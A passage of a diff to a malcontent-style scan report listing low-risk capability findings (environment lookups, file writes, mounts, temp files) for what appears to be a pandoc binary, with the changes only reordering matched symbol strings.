[MD5_str](https://github.com/search?q=MD5_str&type=code) | | LOW | [data/hash/sha1](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha1.yara#SHA1) | Uses the SHA1 signature format | [SHA1_](https://github.com/search?q=SHA1_&type=code) | | LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) | | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [_rand](https://github.com/search?q=_rand&type=code)
[srand](https://github.com/search?q=srand&type=code) | @@ -110,12 +110,12 @@ | LOW | [discover/system/machine_id](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/machine_id.yara#machineid) | Gets a unique machineid for the host | [machineid](https://github.com/search?q=machineid&type=code) | | LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | | LOW | [discover/user/APPDATA](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/APPDATA.yara#APPDATA) | Looks up the application data directory for the current user | [APPDATA](https://github.com/search?q=APPDATA&type=code) | -| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [ENV](https://github.com/search?q=ENV&type=code)
[USER](https://github.com/search?q=USER&type=code)
[environ](https://github.com/search?q=environ&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [getenv](https://github.com/search?q=getenv&type=code)
[HOME](https://github.com/search?q=HOME&type=code) | +| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [environ](https://github.com/search?q=environ&type=code)
[getenv](https://github.com/search?q=getenv&type=code)
[USER](https://github.com/search?q=USER&type=code)
[ENV](https://github.com/search?q=ENV&type=code) | | LOW | [evasion/logging/acct](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/acct.yara#acct) | switch process accounting on or off | [acct](https://github.com/search?q=acct&type=code) | -| LOW | [exec/conditional/LANG](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/conditional/LANG.yara#LANG_getenv) | Looks up language of current user | [LANG](https://github.com/search?q=LANG&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [exec/conditional/LANG](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/conditional/LANG.yara#LANG_getenv) | Looks up language of current user | [getenv](https://github.com/search?q=getenv&type=code)
[LANG](https://github.com/search?q=LANG&type=code) | | LOW | [exec/dylib/iterate](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/iterate.yara#dl_iterate_phdr) | [iterate over list of shared objects](https://man7.org/linux/man-pages/man3/dl_iterate_phdr.3.html) | [dl_iterate_phdr](https://github.com/search?q=dl_iterate_phdr&type=code) | -| LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [Plugin_Abstract](https://github.com/search?q=Plugin_Abstract&type=code)
[QAccessiblePlugin](https://github.com/search?q=QAccessiblePlugin&type=code)
[QAudioSystemPlugin](https://github.com/search?q=QAudioSystemPlugin&type=code)
[QGenericPluginFactory](https://github.com/search?q=QGenericPluginFactory&type=code)
[QIconEnginePlugin](https://github.com/search?q=QIconEnginePlugin&type=code)
[QImageIOPlugin](https://github.com/search?q=QImageIOPlugin&type=code)
[QMediaServiceProviderPlugin](https://github.com/search?q=QMediaServiceProviderPlugin&type=code)
[QPictureFormatPlugin](https://github.com/search?q=QPictureFormatPlugin&type=code)
[QPluginLoader](https://github.com/search?q=QPluginLoader&type=code)
[QQmlEngineExtensionPlugin](https://github.com/search?q=QQmlEngineExtensionPlugin&type=code)
[QQmlExtensionPlugin](https://github.com/search?q=QQmlExtensionPlugin&type=code)
[QScriptExtensionPlugin](https://github.com/search?q=QScriptExtensionPlugin&type=code)
[QSqlDriverPlugin](https://github.com/search?q=QSqlDriverPlugin&type=code)
[QStaticPlugin](https://github.com/search?q=QStaticPlugin&type=code)
[QStylePlugin](https://github.com/search?q=QStylePlugin&type=code)
[QTextToSpeechPlugin](https://github.com/search?q=QTextToSpeechPlugin&type=code)
[QVirtualKeyboardExtensionPlugin](https://github.com/search?q=QVirtualKeyboardExtensionPlugin&type=code)
[addCorePlugin_closure](https://github.com/search?q=addCorePlugin_closure&type=code)
[addCorePlugin_info](https://github.com/search?q=addCorePlugin_info&type=code)
[enabledPlugin](https://github.com/search?q=enabledPlugin&type=code)
[js plugins](https://github.com/search?q=js+plugins&type=code)
[msession_plugin](https://github.com/search?q=msession_plugin&type=code)
[mysqlnd_uh_server_option_plugin_dir](https://github.com/search?q=mysqlnd_uh_server_option_plugin_dir&type=code)
[plugin_abstract](https://github.com/search?q=plugin_abstract&type=code)
[plugin_path](https://github.com/search?q=plugin_path&type=code)
[qAddCorePlugin_closure](https://github.com/search?q=qAddCorePlugin_closure&type=code)
[qAddCorePlugin_info](https://github.com/search?q=qAddCorePlugin_info&type=code) | +| LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [mysqlnd_uh_server_option_plugin_dir](https://github.com/search?q=mysqlnd_uh_server_option_plugin_dir&type=code)
[QVirtualKeyboardExtensionPlugin](https://github.com/search?q=QVirtualKeyboardExtensionPlugin&type=code)
[QMediaServiceProviderPlugin](https://github.com/search?q=QMediaServiceProviderPlugin&type=code)
[QQmlEngineExtensionPlugin](https://github.com/search?q=QQmlEngineExtensionPlugin&type=code)
[QScriptExtensionPlugin](https://github.com/search?q=QScriptExtensionPlugin&type=code)
[qAddCorePlugin_closure](https://github.com/search?q=qAddCorePlugin_closure&type=code)
[QGenericPluginFactory](https://github.com/search?q=QGenericPluginFactory&type=code)
[addCorePlugin_closure](https://github.com/search?q=addCorePlugin_closure&type=code)
[QPictureFormatPlugin](https://github.com/search?q=QPictureFormatPlugin&type=code)
[QQmlExtensionPlugin](https://github.com/search?q=QQmlExtensionPlugin&type=code)
[QTextToSpeechPlugin](https://github.com/search?q=QTextToSpeechPlugin&type=code)
[qAddCorePlugin_info](https://github.com/search?q=qAddCorePlugin_info&type=code)
[QAudioSystemPlugin](https://github.com/search?q=QAudioSystemPlugin&type=code)
[addCorePlugin_info](https://github.com/search?q=addCorePlugin_info&type=code)
[QAccessiblePlugin](https://github.com/search?q=QAccessiblePlugin&type=code)
[QIconEnginePlugin](https://github.com/search?q=QIconEnginePlugin&type=code)
[QSqlDriverPlugin](https://github.com/search?q=QSqlDriverPlugin&type=code)
[Plugin_Abstract](https://github.com/search?q=Plugin_Abstract&type=code)
[msession_plugin](https://github.com/search?q=msession_plugin&type=code)
[plugin_abstract](https://github.com/search?q=plugin_abstract&type=code)
[QImageIOPlugin](https://github.com/search?q=QImageIOPlugin&type=code)
[QPluginLoader](https://github.com/search?q=QPluginLoader&type=code)
[QStaticPlugin](https://github.com/search?q=QStaticPlugin&type=code)
[enabledPlugin](https://github.com/search?q=enabledPlugin&type=code)
[QStylePlugin](https://github.com/search?q=QStylePlugin&type=code)
[plugin_path](https://github.com/search?q=plugin_path&type=code)
[js plugins](https://github.com/search?q=js+plugins&type=code) | | LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | | LOW | [exec/shell/SHELL](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/SHELL.yara#SHELL) | [path to active shell](https://man.openbsd.org/login.1#ENVIRONMENT) | [SHELL](https://github.com/search?q=SHELL&type=code) | | LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | @@ -126,22 +126,22 @@ | LOW | [fs/file/delete_forcibly](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete-forcibly.yara#rm_force) | Forcibly deletes files | [rm --](https://github.com/search?q=rm++--&type=code) | | LOW | [fs/file/open](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-open.yara#java_open) | opens files | [openFile](https://github.com/search?q=openFile&type=code) | | LOW | [fs/file/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-read.yara#go_file_read) | reads files | [ReadFile](https://github.com/search?q=ReadFile&type=code) | -| LOW | [fs/file/rename](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-rename.yara#explicit_rename) | renames files | [MoveFile](https://github.com/search?q=MoveFile&type=code)
[os.rename](https://github.com/search?q=os.rename&type=code)
[renameFile](https://github.com/search?q=renameFile&type=code) | +| LOW | [fs/file/rename](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-rename.yara#explicit_rename) | renames files | [renameFile](https://github.com/search?q=renameFile&type=code)
[os.rename](https://github.com/search?q=os.rename&type=code)
[MoveFile](https://github.com/search?q=MoveFile&type=code) | | LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate](https://github.com/search?q=ftruncate&type=code) | -| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write) | writes to file | [29762_TextziXML_writeFile1_closure](https://github.com/search?q=29762_TextziXML_writeFile1_closure&type=code)
[29762_TextziXML_writeFile1_info](https://github.com/search?q=29762_TextziXML_writeFile1_info&type=code)
[29762_TextziXML_writeFile2_closure](https://github.com/search?q=29762_TextziXML_writeFile2_closure&type=code)
[29762_TextziXML_writeFile2_info](https://github.com/search?q=29762_TextziXML_writeFile2_info&type=code)
[29762_TextziXML_writeFile3_closure](https://github.com/search?q=29762_TextziXML_writeFile3_closure&type=code)
[29762_TextziXML_writeFile3_info](https://github.com/search?q=29762_TextziXML_writeFile3_info&type=code)
[29762_TextziXML_writeFile_closure](https://github.com/search?q=29762_TextziXML_writeFile_closure&type=code)
[29762_TextziXML_writeFile_info](https://github.com/search?q=29762_TextziXML_writeFile_info&type=code)
[29762_TextziXML_writeFilezugoRight_closure](https://github.com/search?q=29762_TextziXML_writeFilezugoRight_closure&type=code)
[29762_TextziXML_writeFilezugoRight_info](https://github.com/search?q=29762_TextziXML_writeFilezugoRight_info&type=code)
[StringziBuilder_writeFile1_closure](https://github.com/search?q=StringziBuilder_writeFile1_closure&type=code)
[StringziBuilder_writeFile1_info](https://github.com/search?q=StringziBuilder_writeFile1_info&type=code)
[StringziBuilder_writeFile_closure](https://github.com/search?q=StringziBuilder_writeFile_closure&type=code)
[StringziBuilder_writeFile_info](https://github.com/search?q=StringziBuilder_writeFile_info&type=code)
[XMLziUnresolved_writeFile1_closure](https://github.com/search?q=XMLziUnresolved_writeFile1_closure&type=code)
[XMLziUnresolved_writeFile1_info](https://github.com/search?q=XMLziUnresolved_writeFile1_info&type=code)
[XMLziUnresolved_writeFile2_closure](https://github.com/search?q=XMLziUnresolved_writeFile2_closure&type=code)
[XMLziUnresolved_writeFile2_info](https://github.com/search?q=XMLziUnresolved_writeFile2_info&type=code)
[XMLziUnresolved_writeFile3_closure](https://github.com/search?q=XMLziUnresolved_writeFile3_closure&type=code)
[XMLziUnresolved_writeFile3_info](https://github.com/search?q=XMLziUnresolved_writeFile3_info&type=code)
[XMLziUnresolved_writeFile_closure](https://github.com/search?q=XMLziUnresolved_writeFile_closure&type=code)
[XMLziUnresolved_writeFile_info](https://github.com/search?q=XMLziUnresolved_writeFile_info&type=code)
[XMLziUnresolved_writeFilezugoRight_closure](https://github.com/search?q=XMLziUnresolved_writeFilezugoRight_closure&type=code)
[XMLziUnresolved_writeFilezugoRight_info](https://github.com/search?q=XMLziUnresolved_writeFilezugoRight_info&type=code)
[_DataziTextziIO_writeFile1_closure](https://github.com/search?q=_DataziTextziIO_writeFile1_closure&type=code)
[_DataziTextziIO_writeFile1_info](https://github.com/search?q=_DataziTextziIO_writeFile1_info&type=code)
[_DataziTextziIO_writeFile_closure](https://github.com/search?q=_DataziTextziIO_writeFile_closure&type=code)
[_DataziTextziIO_writeFile_info](https://github.com/search?q=_DataziTextziIO_writeFile_info&type=code)
[ataziByteString_writeFile1_closure](https://github.com/search?q=ataziByteString_writeFile1_closure&type=code)
[ataziByteString_writeFile1_info](https://github.com/search?q=ataziByteString_writeFile1_info&type=code)
[ataziByteString_writeFile_closure](https://github.com/search?q=ataziByteString_writeFile_closure&type=code)
[ataziByteString_writeFile_info](https://github.com/search?q=ataziByteString_writeFile_info&type=code)
[base_SystemziIO_writeFile1_closure](https://github.com/search?q=base_SystemziIO_writeFile1_closure&type=code)
[base_SystemziIO_writeFile1_info](https://github.com/search?q=base_SystemziIO_writeFile1_info&type=code)
[base_SystemziIO_writeFile_closure](https://github.com/search?q=base_SystemziIO_writeFile_closure&type=code)
[base_SystemziIO_writeFile_info](https://github.com/search?q=base_SystemziIO_writeFile_info&type=code)
[teStringziLazzy_writeFile1_closure](https://github.com/search?q=teStringziLazzy_writeFile1_closure&type=code)
[teStringziLazzy_writeFile1_info](https://github.com/search?q=teStringziLazzy_writeFile1_info&type=code)
[teStringziLazzy_writeFile_closure](https://github.com/search?q=teStringziLazzy_writeFile_closure&type=code)
[teStringziLazzy_writeFile_info](https://github.com/search?q=teStringziLazzy_writeFile_info&type=code)
[tziPandocziUTF8_writeFile1_closure](https://github.com/search?q=tziPandocziUTF8_writeFile1_closure&type=code)
[tziPandocziUTF8_writeFile1_info](https://github.com/search?q=tziPandocziUTF8_writeFile1_info&type=code)
[tziPandocziUTF8_writeFileWith1_closure](https://github.com/search?q=tziPandocziUTF8_writeFileWith1_closure&type=code)
[tziPandocziUTF8_writeFileWith1_info](https://github.com/search?q=tziPandocziUTF8_writeFileWith1_info&type=code)
[tziPandocziUTF8_writeFileWith_closure](https://github.com/search?q=tziPandocziUTF8_writeFileWith_closure&type=code)
[tziPandocziUTF8_writeFileWith_info](https://github.com/search?q=tziPandocziUTF8_writeFileWith_info&type=code)
[tziPandocziUTF8_writeFile_closure](https://github.com/search?q=tziPandocziUTF8_writeFile_closure&type=code)
[tziPandocziUTF8_writeFile_info](https://github.com/search?q=tziPandocziUTF8_writeFile_info&type=code)
[writeEventLogFileNoop](https://github.com/search?q=writeEventLogFileNoop&type=code)
[ystemziIOziTemp_writeTempFile1_closure](https://github.com/search?q=ystemziIOziTemp_writeTempFile1_closure&type=code)
[ystemziIOziTemp_writeTempFile2_closure](https://github.com/search?q=ystemziIOziTemp_writeTempFile2_closure&type=code)
[ystemziIOziTemp_writeTempFile3_closure](https://github.com/search?q=ystemziIOziTemp_writeTempFile3_closure&type=code)
[ystemziIOziTemp_writeTempFile4_closure](https://github.com/search?q=ystemziIOziTemp_writeTempFile4_closure&type=code)
[ystemziIOziTemp_writeTempFile5_closure](https://github.com/search?q=ystemziIOziTemp_writeTempFile5_closure&type=code)
[ystemziIOziTemp_writeTempFile_closure](https://github.com/search?q=ystemziIOziTemp_writeTempFile_closure&type=code)
[ystemziIOziTemp_writeTempFile_info](https://github.com/search?q=ystemziIOziTemp_writeTempFile_info&type=code) | +| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write) | writes to file | [29762_TextziXML_writeFilezugoRight_closure](https://github.com/search?q=29762_TextziXML_writeFilezugoRight_closure&type=code)
[XMLziUnresolved_writeFilezugoRight_closure](https://github.com/search?q=XMLziUnresolved_writeFilezugoRight_closure&type=code)
[29762_TextziXML_writeFilezugoRight_info](https://github.com/search?q=29762_TextziXML_writeFilezugoRight_info&type=code)
[XMLziUnresolved_writeFilezugoRight_info](https://github.com/search?q=XMLziUnresolved_writeFilezugoRight_info&type=code)
[tziPandocziUTF8_writeFileWith1_closure](https://github.com/search?q=tziPandocziUTF8_writeFileWith1_closure&type=code)
[ystemziIOziTemp_writeTempFile1_closure](https://github.com/search?q=ystemziIOziTemp_writeTempFile1_closure&type=code)
[ystemziIOziTemp_writeTempFile2_closure](https://github.com/search?q=ystemziIOziTemp_writeTempFile2_closure&type=code)
[ystemziIOziTemp_writeTempFile3_closure](https://github.com/search?q=ystemziIOziTemp_writeTempFile3_closure&type=code)
[ystemziIOziTemp_writeTempFile4_closure](https://github.com/search?q=ystemziIOziTemp_writeTempFile4_closure&type=code)
[ystemziIOziTemp_writeTempFile5_closure](https://github.com/search?q=ystemziIOziTemp_writeTempFile5_closure&type=code)
[tziPandocziUTF8_writeFileWith_closure](https://github.com/search?q=tziPandocziUTF8_writeFileWith_closure&type=code)
[ystemziIOziTemp_writeTempFile_closure](https://github.com/search?q=ystemziIOziTemp_writeTempFile_closure&type=code)
[tziPandocziUTF8_writeFileWith1_info](https://github.com/search?q=tziPandocziUTF8_writeFileWith1_info&type=code)
[29762_TextziXML_writeFile1_closure](https://github.com/search?q=29762_TextziXML_writeFile1_closure&type=code)
[29762_TextziXML_writeFile2_closure](https://github.com/search?q=29762_TextziXML_writeFile2_closure&type=code)
[29762_TextziXML_writeFile3_closure](https://github.com/search?q=29762_TextziXML_writeFile3_closure&type=code)
[StringziBuilder_writeFile1_closure](https://github.com/search?q=StringziBuilder_writeFile1_closure&type=code)
[XMLziUnresolved_writeFile1_closure](https://github.com/search?q=XMLziUnresolved_writeFile1_closure&type=code)
[XMLziUnresolved_writeFile2_closure](https://github.com/search?q=XMLziUnresolved_writeFile2_closure&type=code)
[XMLziUnresolved_writeFile3_closure](https://github.com/search?q=XMLziUnresolved_writeFile3_closure&type=code)
[_DataziTextziIO_writeFile1_closure](https://github.com/search?q=_DataziTextziIO_writeFile1_closure&type=code)
[ataziByteString_writeFile1_closure](https://github.com/search?q=ataziByteString_writeFile1_closure&type=code)
[base_SystemziIO_writeFile1_closure](https://github.com/search?q=base_SystemziIO_writeFile1_closure&type=code)
[teStringziLazzy_writeFile1_closure](https://github.com/search?q=teStringziLazzy_writeFile1_closure&type=code)
[tziPandocziUTF8_writeFile1_closure](https://github.com/search?q=tziPandocziUTF8_writeFile1_closure&type=code)
[tziPandocziUTF8_writeFileWith_info](https://github.com/search?q=tziPandocziUTF8_writeFileWith_info&type=code)
[ystemziIOziTemp_writeTempFile_info](https://github.com/search?q=ystemziIOziTemp_writeTempFile_info&type=code)
[29762_TextziXML_writeFile_closure](https://github.com/search?q=29762_TextziXML_writeFile_closure&type=code)
[StringziBuilder_writeFile_closure](https://github.com/search?q=StringziBuilder_writeFile_closure&type=code)
[XMLziUnresolved_writeFile_closure](https://github.com/search?q=XMLziUnresolved_writeFile_closure&type=code)
[_DataziTextziIO_writeFile_closure](https://github.com/search?q=_DataziTextziIO_writeFile_closure&type=code)
[ataziByteString_writeFile_closure](https://github.com/search?q=ataziByteString_writeFile_closure&type=code)
[base_SystemziIO_writeFile_closure](https://github.com/search?q=base_SystemziIO_writeFile_closure&type=code)
[teStringziLazzy_writeFile_closure](https://github.com/search?q=teStringziLazzy_writeFile_closure&type=code)
[tziPandocziUTF8_writeFile_closure](https://github.com/search?q=tziPandocziUTF8_writeFile_closure&type=code)
[29762_TextziXML_writeFile1_info](https://github.com/search?q=29762_TextziXML_writeFile1_info&type=code)
[29762_TextziXML_writeFile2_info](https://github.com/search?q=29762_TextziXML_writeFile2_info&type=code)
[29762_TextziXML_writeFile3_info](https://github.com/search?q=29762_TextziXML_writeFile3_info&type=code)
[StringziBuilder_writeFile1_info](https://github.com/search?q=StringziBuilder_writeFile1_info&type=code)
[XMLziUnresolved_writeFile1_info](https://github.com/search?q=XMLziUnresolved_writeFile1_info&type=code)
[XMLziUnresolved_writeFile2_info](https://github.com/search?q=XMLziUnresolved_writeFile2_info&type=code)
[XMLziUnresolved_writeFile3_info](https://github.com/search?q=XMLziUnresolved_writeFile3_info&type=code)
[_DataziTextziIO_writeFile1_info](https://github.com/search?q=_DataziTextziIO_writeFile1_info&type=code)
[ataziByteString_writeFile1_info](https://github.com/search?q=ataziByteString_writeFile1_info&type=code)
[base_SystemziIO_writeFile1_info](https://github.com/search?q=base_SystemziIO_writeFile1_info&type=code)
[teStringziLazzy_writeFile1_info](https://github.com/search?q=teStringziLazzy_writeFile1_info&type=code)
[tziPandocziUTF8_writeFile1_info](https://github.com/search?q=tziPandocziUTF8_writeFile1_info&type=code)
[29762_TextziXML_writeFile_info](https://github.com/search?q=29762_TextziXML_writeFile_info&type=code)
[StringziBuilder_writeFile_info](https://github.com/search?q=StringziBuilder_writeFile_info&type=code)
[XMLziUnresolved_writeFile_info](https://github.com/search?q=XMLziUnresolved_writeFile_info&type=code)
[_DataziTextziIO_writeFile_info](https://github.com/search?q=_DataziTextziIO_writeFile_info&type=code)
[ataziByteString_writeFile_info](https://github.com/search?q=ataziByteString_writeFile_info&type=code)
[base_SystemziIO_writeFile_info](https://github.com/search?q=base_SystemziIO_writeFile_info&type=code)
[teStringziLazzy_writeFile_info](https://github.com/search?q=teStringziLazzy_writeFile_info&type=code)
[tziPandocziUTF8_writeFile_info](https://github.com/search?q=tziPandocziUTF8_writeFile_info&type=code)
[writeEventLogFileNoop](https://github.com/search?q=writeEventLogFileNoop&type=code) | | LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | | LOW | [fs/lock_update](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/lock-update.yara#flock) | apply or remove an advisory lock on a file | [flock](https://github.com/search?q=flock&type=code) | -| LOW | [fs/mount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount) | mounts file systems | [-o](https://github.com/search?q=-o&type=code)
[mount](https://github.com/search?q=mount&type=code) | +| LOW | [fs/mount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount) | mounts file systems | [mount](https://github.com/search?q=mount&type=code)
[-o](https://github.com/search?q=-o&type=code) | | LOW | [fs/node_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/node-create.yara#mknod) | [create device files](https://man7.org/linux/man-pages/man2/mknod.2.html) | [mknod](https://github.com/search?q=mknod&type=code) | -| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/mtab](https://github.com/search?q=%2Fetc%2Fmtab&type=code)
[/etc/security/cacerts/](https://github.com/search?q=%2Fetc%2Fsecurity%2Fcacerts%2F&type=code)
[/etc/ssl/cert.pem](https://github.com/search?q=%2Fetc%2Fssl%2Fcert.pem&type=code)
[/etc/ssl/certs/](https://github.com/search?q=%2Fetc%2Fssl%2Fcerts%2F&type=code) | -| LOW | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/Cellar/pandoc/3.5/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fpandoc%2F3.5%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code)
[/home/linuxbrew/.linuxbrew/opt/zlib/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fzlib%2Flib&type=code) | +| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/security/cacerts/](https://github.com/search?q=%2Fetc%2Fsecurity%2Fcacerts%2F&type=code)
[/etc/ssl/cert.pem](https://github.com/search?q=%2Fetc%2Fssl%2Fcert.pem&type=code)
[/etc/ssl/certs/](https://github.com/search?q=%2Fetc%2Fssl%2Fcerts%2F&type=code)
[/etc/mtab](https://github.com/search?q=%2Fetc%2Fmtab&type=code) | +| LOW | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/pandoc/3.5/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fpandoc%2F3.5%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/zlib/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fzlib%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code) | | LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/tmp](https://github.com/search?q=%2Fvar%2Ftmp&type=code) | | LOW | [fs/permission/chown](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-chown.yara#fchown) | May change file ownership | [fchown](https://github.com/search?q=fchown&type=code) | | LOW | [fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) | | LOW | [fs/tempdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempdir.yara#tempdir) | looks up location of temp directory | [TMPDIR](https://github.com/search?q=TMPDIR&type=code) | -| LOW | [fs/tempdir/TEMP](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/TEMP.yara#temp) | temp | [TEMP](https://github.com/search?q=TEMP&type=code)
[getenv](https://github.com/search?q=getenv&type=code)
[temp](https://github.com/search?q=temp&type=code) | +| LOW | [fs/tempdir/TEMP](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/TEMP.yara#temp) | temp | [getenv](https://github.com/search?q=getenv&type=code)
[TEMP](https://github.com/search?q=TEMP&type=code)
[temp](https://github.com/search?q=temp&type=code) | | LOW | [fs/tempdir/TMPDIR](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/TMPDIR.yara#TMPDIR) | TMPDIR | [TMPDIR](https://github.com/search?q=TMPDIR&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [fs/tempfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempfile.yara#mktemp) | creates temporary files | [mktemp](https://github.com/search?q=mktemp&type=code)
[tmpfile](https://github.com/search?q=tmpfile&type=code) | +| LOW | [fs/tempfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempfile.yara#mktemp) | creates temporary files | [tmpfile](https://github.com/search?q=tmpfile&type=code)
[mktemp](https://github.com/search?q=mktemp&type=code) | | LOW | [fs/unmount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/unmount.yara#umount) | unmount file system | [umount](https://github.com/search?q=umount&type=code) | | LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) | | LOW | [hw/iokit_registry](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/iokit-registry.yara#IORegistry) | access IOKit device driver registry | [IORegistry](https://github.com/search?q=IORegistry&type=code) | @@ -151,7 +151,7 @@ | LOW | [net/http/accept_encoding](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/accept-encoding.yara#content_type) | [set HTTP response encoding format (example: gzip)](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Accept-Encoding) | [Accept-Encoding](https://github.com/search?q=Accept-Encoding&type=code) | | LOW | [net/http/auth](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/auth.yara#http_auth) | makes HTTP requests with Bearer authentication | [WWW-Authenticate](https://github.com/search?q=WWW-Authenticate&type=code)
[Www-Authenticate](https://github.com/search?q=Www-Authenticate&type=code)
